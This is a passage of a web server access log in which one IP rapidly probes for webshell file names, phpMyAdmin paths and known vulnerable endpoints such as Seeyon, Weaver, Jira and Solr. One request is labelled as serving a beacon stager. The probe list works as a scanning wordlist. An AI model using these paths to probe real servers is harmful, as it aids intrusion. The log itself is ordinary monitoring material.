UTC] "GET /up.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:13 UTC] "GET /laravel.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:16 UTC] "GET /yu.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:16 UTC] "GET /floaw.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:16 UTC] "GET /ftmabc.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:17 UTC] "GET /doudou.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:19 UTC] "GET /xiaoxia.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:20 UTC] "GET /yuyang.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:20 UTC] "GET /zz.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:21 UTC] "GET /coonig.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:23 UTC] "GET /baidoubi.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:27 UTC] "GET /meijianxue.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:28 UTC] "GET /no1.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:31 UTC] "GET /woshimengmei.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:32 UTC] "GET /indea.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:35 UTC] 
"GET /xiaxia.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:36 UTC] "GET /kk.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:36 UTC] "GET /xsser.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:37 UTC] "GET /zzz.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:40 UTC] "GET /99.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:40 UTC] "GET /dp.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:44 UTC] "GET /1ts.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:48 UTC] "GET /haiyan.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:49 UTC] "GET /phpdm.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:52 UTC] "GET /root.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:52 UTC] "GET /5678.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:56 UTC] "GET /root11.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:59 UTC] "POST /wuwu11.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:05 UTC] "POST /xw1.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:08 UTC] "POST /wc.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown 
[03/31 08:03:09 UTC] "POST /xx.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:12 UTC] "POST /s.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:12 UTC] "POST /w.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:12 UTC] "POST /sheep.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:13 UTC] "POST /qaq.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:15 UTC] "POST /my.php/" 200 208983 "beacon beacon stager x86" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:32 UTC] "POST /qq.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:36 UTC] "POST /hhh.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:36 UTC] "POST /jjj.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:36 UTC] "POST /vvv.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:40 UTC] "POST /www.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:44 UTC] "POST /ffr.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:44 UTC] "POST /411.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:56 UTC] "POST /444.php" 
404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:56 UTC] "POST /a411.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:56 UTC] "POST /whoami.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:57 UTC] "POST /whoami.php.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:03:59 UTC] "POST /9.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:01 UTC] "POST /98k.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:04 UTC] "POST /981.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:08 UTC] "POST /887.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:08 UTC] "POST /888.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:08 UTC] "POST /aa.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:09 UTC] "POST /bb.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:12 UTC] "POST /pp.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:12 UTC] "POST /tt.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:16 UTC] "POST /bbq.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) 
Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:16 UTC] "POST /jj1.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:16 UTC] "POST /jbb.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:20 UTC] "POST /qwq.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:24 UTC] "POST /nb.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:28 UTC] "POST /hgx.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:33 UTC] "POST /tty.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:35 UTC] "GET /seeyon/htmlofficeservlet" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" +152.136.192.51 unknown unknown [03/31 08:04:36 UTC] "GET /secure/ContactAdministrators!default.jspa" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" +152.136.192.51 unknown unknown [03/31 08:04:36 UTC] "GET /weaver/bsh.servlet.BshServlet" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" +152.136.192.51 unknown unknown [03/31 08:04:37 UTC] "GET /solr/" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" +152.136.192.51 unknown unknown [03/31 08:04:40 UTC] "POST /index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" +152.136.192.51 unknown unknown [03/31 08:04:45 UTC] "POST /user/register" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +152.136.192.51 unknown unknown [03/31 08:04:48 UTC] "GET /joomla/" 
404 0 "" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0)" +152.136.192.51 unknown unknown [03/31 08:04:48 UTC] "POST /user.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:04:48 UTC] "GET /index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:04:51 UTC] "GET /phpMyAdmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:04:56 UTC] "GET /pma/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:03 UTC] "GET /PMA2/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:05 UTC] "GET /pmamy/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:09 UTC] "GET /pmamy2/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:12 UTC] "GET /admin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:12 UTC] "GET /db/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:16 UTC] "GET /dbadmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; 
Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:19 UTC] "GET /admin/pma/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:21 UTC] "GET /admin/PMA/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:24 UTC] "GET /admin/mysql/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:24 UTC] "GET /admin/mysql2/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:24 UTC] "GET /admin/phpmyadmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:25 UTC] "GET /admin/phpMyAdmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:27 UTC] "GET /admin/phpmyadmin2/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:28 UTC] "GET /mysqladmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:28 UTC] "GET /mysql-admin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown 
unknown [03/31 08:05:29 UTC] "GET /mysql_admin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:32 UTC] "GET /phpAdmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:32 UTC] "GET /phpmyadmin0/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:32 UTC] "GET /phpmyadmin1/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:33 UTC] "GET /phpmyadmin2/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:41 UTC] "GET /phpMyAdmin4.8.0/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:47 UTC] "GET /phpMyAdmin4.8.2/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:48 UTC] "GET /phpMyAdmin4.8.3/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:48 UTC] "GET /phpMyAdmin4.8.4/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:53 UTC] "GET /myadmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:56 UTC] "GET /xampp/phpmyadmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:56 UTC] "GET /phpMyadmin_bak/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:56 UTC] "GET /www/phpMyAdmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:57 UTC] "GET /tools/phpMyAdmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:59 UTC] "GET /phpMyAdminold/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:00 UTC] "GET /phpMyAdmin.old/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:00 UTC] "GET /pma-old/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:05 UTC] "GET /claroline/phpMyAdmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:05 UTC] "GET /typo3/phpmyadmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 
unknown unknown [03/31 08:06:05 UTC] "GET /phpma/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:08 UTC] "GET /phpMyAdmin/phpMyAdmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:09 UTC] "GET /phpMyAbmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:09 UTC] "GET /phpMyAdmin__/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:12 UTC] "GET /phpMyAdmin ---/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:12 UTC] "GET /v/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:12 UTC] "GET /phpmyadm1n/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:13 UTC] "GET /phpMyAdm1n/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:15 UTC] "GET /phpMyadmi/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:17 UTC] "GET /phpMyAdmion/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:20 UTC] "GET /MyAdmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:20 UTC] "GET /phpMyAdmin1/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:21 UTC] "GET /phpMyAdmin123/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:22 UTC] "GET /pwd/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:24 UTC] "GET /phpMyAdmina/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:24 UTC] "GET /phpMydmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:24 UTC] "GET /phpMyAdmins/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:26 UTC] "GET /phpMyAdmin._/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:27 UTC] "GET /phpmyadmin2222/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:28 UTC] "GET 
/phpMyAdmin333/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:28 UTC] "GET /phpmyadmin3333/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:30 UTC] "GET /php2MyAdmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:32 UTC] "GET /phpiMyAdmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:33 UTC] "GET /phpNyAdmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:33 UTC] "GET /1/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:36 UTC] "GET /download/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:37 UTC] "GET /phpMyAdmin_111/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:39 UTC] "GET /321/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:40 UTC] "GET /123131/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 
